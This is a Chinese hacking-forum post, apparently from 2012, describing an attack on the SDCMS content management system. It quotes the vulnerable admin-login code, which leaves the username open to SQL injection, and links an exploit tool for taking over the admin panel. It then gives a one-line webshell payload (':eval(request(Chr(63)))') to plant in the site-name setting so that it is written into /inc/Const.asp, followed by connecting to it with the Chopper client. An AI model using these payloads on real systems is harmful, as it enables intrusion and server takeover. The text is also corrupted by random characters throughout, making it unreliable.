作者:T00LS 鬼哥
4 Q' x5 L: E, d, ^漏洞文件:后台目录/index.asp
, u- i/ Z4 N9 J7 c5 x. G
# g" T4 ?; k! m0 vSub Check
7 M) P* J( f' M7 \% H Dim username,password,code,getcode,Rs4 O; T$ j4 d( h5 N. b3 c S
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 R# p7 N b7 a) F/ a/ R
username=FilterText(Trim(Request.Form("username")),1)
( c- G$ m, S+ F+ d password=FilterText(Trim(Request.Form("password")),1)
: N" z; g$ \3 S" R2 m/ y: Z& ^ code=Trim(Request.Form("yzm"))5 E% G" t% W0 A3 i. D) @0 B
getcode=Session("SDCMSCode")) r1 u8 n! U: ~8 c7 T+ G5 _) ?- @& A
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
& U! f" d' V! \, y/ `& X1 I4 v IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
4 N$ I' {1 H/ D9 I IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
$ y6 P- `: p" x4 t; y; y IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
1 b# C% v& |+ \! e9 o8 v8 k IF username="" or password="" Then) u" ]% n" U! p1 h5 V5 q, W6 h
Echo "用户名或密码不能为空"ied
8 z2 d9 q- x' b; Z! U1 t/ K Else
6 }1 W1 M' U6 v Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")9 y* w& {6 s* g' d7 x! D7 a
IF Rs.Eof Then
1 J8 z* A) \; y, k1 l9 ?8 { AddLog username,GetIp,"登录失败",1
. b, J7 a7 |0 d$ l, A Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"5 O3 R5 z* f& G
Else
6 A6 D p( n* I: c Add_Cookies "sdcms_id",Rs(0)3 M( O- l9 E+ p! L! f1 }
Add_Cookies "sdcms_name",username
/ g. ^, l2 V2 [# c4 X1 o9 I Add_Cookies "sdcms_pwd",Rs(2) D9 X/ N0 S, H+ o
Add_Cookies "sdcms_admin",Rs(3)
b) r6 n' T1 Y' Z" Q) v+ v Add_Cookies "sdcms_alllever",Rs(4)/ C7 z, ~; x- A* e3 N% s
Add_Cookies "sdcms_infolever",Rs(5)& ~ @9 Z* J: o# c3 N
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
. g4 w0 C. S* g$ s2 [ AddLog username,GetIp,"登录成功",1 m" K9 g: K9 D: C. H# Z2 N$ v
'自动删除30天前的Log记录
. v; @3 u% Y/ e: \ IF Sdcms_DataType Then
4 F- N6 C# P- T& i$ i7 Z! [2 X Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")4 t! M# y, D( |
Else4 S1 Q. y, V. s0 R0 n
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")+ Q- u; |* \. i$ X9 K, o
End IF% g! R# R( I: Z Y+ j
Go("sdcms_index.asp")# f) n, Y5 @6 } A) L
End IF, t5 Z. g* `8 L1 B8 P
Rs.Close+ d' P) _7 S [, O* D6 ?
Set Rs=Nothing) u- W$ g7 z" I2 {% k/ @
End IF
1 \ s) B3 a+ X cEnd Sub
+ S C, e# g3 N3 g, |: L
% c: T3 v- p e2 i, l& L) P& W’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
3 l( o( i8 p+ W7 c
6 N/ R! d$ K" ^1 AFunction FilterText(ByVal t0,ByVal t1)
2 W9 G7 M0 |2 z ^! E2 \8 ~" f IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function8 p) @, E& K; l( L5 x# M: _
t0=Trim(t0)2 w& B7 K Q8 o- ^
Select Case t1& A4 v, y& @/ e) N$ q: P, c
Case "1"9 Y& @; E. q+ g+ j' V# y
t0=Replace(t0,Chr(32),"")
9 y9 y8 n' Y* j _/ a: g t0=Replace(t0,Chr(13),"")1 t1 b+ M, b7 W. f: h" D
t0=Replace(t0,Chr(10)&Chr(10),"")
# S: R/ W% A) Q `6 U, p t0=Replace(t0,Chr(10),"")
( h( E% D {7 h, E7 L1 W Case "2"
" Z" n) P/ h9 a5 \/ w2 C t0=Replace(t0,Chr(8),"")'回格
$ \9 e1 t9 x9 y+ L( ?: u6 j" x t0=Replace(t0,Chr(9),"")'tab(水平制表符)
( a4 k- N$ R4 ]( v# |) [8 Y t0=Replace(t0,Chr(10),"")'换行
: y( u' F8 m/ A8 x9 r t0=Replace(t0,Chr(11),"")'tab(垂直制表符)* n4 r4 s8 \! {. A9 T( K. E+ }
t0=Replace(t0,Chr(12),"")'换页3 x) x6 m/ u6 L$ h3 a7 I
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
$ e8 N; P* I. L t0=Replace(t0,Chr(22),"")& B. A) N0 p6 O4 d
t0=Replace(t0,Chr(32),"")'空格 SPACE2 a( b3 @9 Z" e* g! B0 g
t0=Replace(t0,Chr(33),"")'!5 D) F' f4 J8 \5 a3 \$ V8 W
t0=Replace(t0,Chr(34),"")'" l: d9 G# y6 g2 }! D
t0=Replace(t0,Chr(35),"")'#
; i, E- M3 B _; M' L t0=Replace(t0,Chr(36),"")'$
4 X& z2 c0 X, V | t0=Replace(t0,Chr(37),"")'%
8 j6 V0 `8 F7 n) A( z, @! _2 f t0=Replace(t0,Chr(38),"")'&
0 C! |* h4 ^8 j0 R8 S t0=Replace(t0,Chr(39),"")''
5 d8 N7 w, G6 N' M0 P t0=Replace(t0,Chr(40),"")'(6 o' u: t! j) |: L
t0=Replace(t0,Chr(41),"")')5 V. P- I0 `, \% L
t0=Replace(t0,Chr(42),"")'*: D/ S c- u7 X
t0=Replace(t0,Chr(43),"")'+
9 k6 _) y* H- _9 J! ~$ ? t0=Replace(t0,Chr(44),"")',
( e* z% t% G) q6 R; i' p t0=Replace(t0,Chr(45),"")'-: _6 o! Z" @* [7 \
t0=Replace(t0,Chr(46),"")'.: f. r; B$ Y" b& E
t0=Replace(t0,Chr(47),"")'/. \. A1 H5 c1 t( k- ]# @
t0=Replace(t0,Chr(58),"")':9 t* `2 ?+ l# v- g3 H V, N* J
t0=Replace(t0,Chr(59),"")';
1 R. J& N9 i' ] t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
" l+ q. O( y. R; b- I1 W) c) _ t0=Replace(t0,Chr(63),"")'?
+ x9 o( t9 m. B% A7 I t0=Replace(t0,Chr(64),"")'@) u" l8 e0 l# P; b6 E
t0=Replace(t0,Chr(91),"")'\! J5 q; \" D/ t+ n
t0=Replace(t0,Chr(92),"")'\( _8 e# M3 Y U( F/ M! Y* d) x2 _4 V2 C
t0=Replace(t0,Chr(93),"")']4 `* J2 f: \+ g x) |
t0=Replace(t0,Chr(94),"")'^. N1 q ]3 o5 q. I6 S2 Q
t0=Replace(t0,Chr(95),"")'_: o) L e+ R2 m# x+ o' p4 g
t0=Replace(t0,Chr(96),"")'`
( X9 F! p D, l$ l5 ?! |& T t0=Replace(t0,Chr(123),"")'{6 V* \! O/ K/ R N3 t
t0=Replace(t0,Chr(124),"")'|
$ [5 ~- W5 `# p0 [8 Q* M t0=Replace(t0,Chr(125),"")'}
8 K# N, K! W$ | t0=Replace(t0,Chr(126),"")'~
4 Y5 a% w& D& I! p! H Case Else
7 u0 ~+ c4 H; e( m t0=Replace(t0, "&", "&")
# D2 L- t& s: X# F5 Y6 b. I/ J t0=Replace(t0, "'", "'")
# q8 K! d6 u" A( F l. |- n t0=Replace(t0, """", """)( {- z3 g; h# C. ]. q5 O$ j! i4 t
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
6 O5 Y Q7 A8 R- H; s8 g7 b+ c End Select; I- ]9 x1 Y, {1 M, Z+ c+ h
IF Instr(Lcase(t0),"expression")>0 Then
- e( b6 {' z& a8 V4 r t0=Replace(t0,"expression","e­xpression", 1, -1, 0)4 [3 V, N2 Q, Y+ ?' d( @% ^$ V
End If5 n# C: |: H; Q) ]
FilterText=t0
- d) b" v3 R( r: k8 o' }5 vEnd Function0 x; W) r T6 f6 D0 Q
/ d$ j f8 n+ z, C
看到没。直接参数是1 只过滤
+ Y2 f: N- ?7 }: Y$ O; v4 x, \! X% D* f t0=Replace(t0,Chr(32)," "); M( q/ W: `& ?2 k6 A
t0=Replace(t0,Chr(13),"")
4 S: ~3 i( _! N' B* U6 f t0=Replace(t0,Chr(10)&Chr(10),"6 \! Z: ]0 w u, T
")
; \7 T8 g3 G( v1 H) V5 d t0=Replace(t0,Chr(10)," q8 C3 c7 [4 e K+ q0 u& \0 b
")
& [. F9 f8 r; Q+ R, i8 V3 F漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
' z. i& d' \8 u4 V& y% P# t* iEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP0 B0 V0 m% q6 r
3 ^. s" S: b' ]2 {; \测试: C8 M( J& s U, D
+ p9 J e5 E- ^( L9 |* s" s0 }' O( _8 H" K& c
现在输入工具上验证码,然后点OK7 r# H# s% ?# p' v5 I
- Z8 }# W7 x. f6 b, |, R
( k/ a- G3 d7 |5 S- v. u" }看到我们直接进入后台管理界面了,呵呵!: h4 i0 F4 C3 w# A" e$ A6 X" u
' m, P: U3 \* N: h. b
a) v8 `; E: Z- |( l) [
0 F. ^: o1 Y5 f4 z+ x
这样直接进入后台了。。。。
: {8 L! O, \$ u: R& q: y: I2 @
8 i9 q6 P2 @/ I% l3 a
, j% Y: _& O+ a- y ?
# O! x: Y' K' ?SDCMS提权:
& P+ T" h4 v" D$ }* |1 S
" k: |: [" ?4 {1 ~! G" w5 a方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
8 V1 T- r4 I! |0 C' y4 Y+ w' t2 v+ o- T4 i
$ A# L( q$ M0 T6 l/ v7 E
( n5 j. P4 t1 Y- b# yOK,现在用菜刀连接下!
: M/ @' l; Q2 o0 T" J% m6 ?( J
( r$ d# c2 k/ |+ p2 g: ^
6 ^1 ^9 p; x6 F5 e1 b2 Y+ F" M: B T% ^1 z* p' l) s- `2 z
3 Y' D7 B; Z( K. n1 D% b1 X0 s
' D& @+ `6 P: n! g. ]6 S' o% L |
发表于 2012-11-9 20:57:02
收藏
支持
反对